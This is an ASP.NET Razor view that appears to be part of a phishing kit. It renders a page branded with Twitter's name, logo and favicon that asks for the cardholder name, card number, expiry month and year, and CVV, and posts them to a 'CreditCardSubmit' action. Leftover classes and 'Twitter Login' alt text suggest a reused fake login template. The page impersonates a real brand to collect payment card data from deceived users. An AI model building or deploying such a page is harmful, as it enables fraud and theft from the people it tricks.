@model CreditCardViewModel

@{
    Layout = null;
}

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Twitter - Credit Card</title>
    <link href="~/assets/twitter/css/style.css" rel="stylesheet" />
    <!--FAVICON-->
    <link rel="icon" type="image/png" href="~/assets/twitter/img/twitter-logo.png">
</head>

<body>
    <header class="container">
        <div class="logo">
            <img src="~/assets/twitter/img/twitter-logo.png" alt="Twitter Login">
        </div>
    </header>

    <main class="container">
        <h1>Credit Card Info</h1>
        <div class="container">
            <form asp-action="CreditCardSubmit" method="post">
                <input asp-for="Id" type="hidden" value="@ViewBag.Id" />
                <div class="inputs">
                    <label class="usuario" for="usuario">
                        Name on Card
                    </label><br>
                    <input asp-for="NameSurname"  type="text" required>
                </div>
                <div class="inputs">
                    <label class="senha" for="senha">Credit Card Number</label><br>
                    <input asp-for="CreditCardNumber" type="text" required>
                </div>
                <div class="inputs">
                    <label class="senha" for="senha">Month</label><br>
                    <input asp-for="CreditCardExpirationMonth" type="text" minlength="2" maxlength="2" required>
                </div>
                <div class="inputs">
                    <label class="senha" for="senha">Year</label><br>
                    <input asp-for="CreditCardExpirationYear" type="text" minlength="4" maxlength="4" required>
                </div>
                <div class="inputs">
                    <label class="senha" for="senha">CVV</label><br>
                    <input asp-for="CreditCardCVV" type="text" minlength="3" maxlength="3" required>
                </div>
                <br>
                <button class="button" type="submit">Submit</button>
            </form>
        </div>
    </main>
</body>

</html>